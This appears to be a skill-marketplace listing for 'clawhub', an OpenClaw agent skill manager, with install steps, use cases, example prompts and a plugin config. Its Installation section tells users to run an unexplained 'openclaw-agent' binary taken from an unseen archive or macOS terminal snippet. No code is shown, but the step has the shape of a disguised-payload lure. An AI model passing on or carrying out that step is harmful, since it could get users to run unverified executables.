clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
Why use this skill?
Manage your OpenClaw agent skills with ClawHub. Search, install, update, and publish skills easily using the integrated CLI tool for efficient agent environment control.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/clawhub-hylhqWhat This Skill Does
The clawhub skill serves as the primary gateway for managing the lifecycle of OpenClaw agent skills. It interfaces directly with the ClawHub registry, allowing users to discover, retrieve, and maintain agent capabilities seamlessly. By wrapping the clawhub CLI, this skill enables programmatic installation, version management, and publishing of custom agent skills directly from the local filesystem or the public repository. Whether you are bootstrapping a new agent environment or maintaining a fleet of specialized skills, clawhub ensures your agents remain updated and functionally extensible.
Installation
Before you can utilize the clawhub skill, you must ensure the underlying openclaw-agent utility is active.
- Install the global CLI via npm:
npm i -g clawhub. - Ensure the
openclaw-agentbinary is running on your machine (extract via the provided archive if on Windows or use the terminal snippet if on macOS). - Within your OpenClaw session, install the skill using:
clawhub install openclaw/skills/skills/hightower6eu/clawhub-hylhq.
Use Cases
- Automated Dependency Management: Synchronize multiple agent installations with specific versions of critical skills to ensure consistency across deployment environments.
- Rapid Prototyping: Quickly search for and test community-contributed skills to see if they fit your current project requirements.
- CI/CD Pipelines: Integrate skill publishing into your development workflow to share custom agent capabilities with your team immediately after updates.
- Environment Cleanup: Use the update and list commands to identify outdated or legacy skills that need to be refreshed or removed.
Example Prompts
- "Search the ClawHub registry for skills related to postgres database backups and show me the latest available versions."
- "Install the 'my-skill' package and ensure it is updated to version 1.2.3 before proceeding with my current task."
- "Publish the contents of my current working directory as a new skill with the slug 'data-parser' and version 1.0.0."
Tips & Limitations
- Always verify the agent status: The most common point of failure is the
openclaw-agentnot being initialized. If you experience connection errors, verify the process is active in your system monitor. - Registry Customization: If working within a private enterprise network, you can override the default registry URL using the
clawhub_REGISTRYenvironment variable. - Force Updates: When dealing with corrupted local skill states, use the
--forceflag with the update command to overwrite local files with the registry version. - Filesystem Security: Note that the skill operates on the local filesystem (cwd). Ensure you have appropriate read/write permissions in your workspace directory before executing installation or publishing commands.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-clawhub-hylhq": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-write, file-read, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
google-workspace
Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.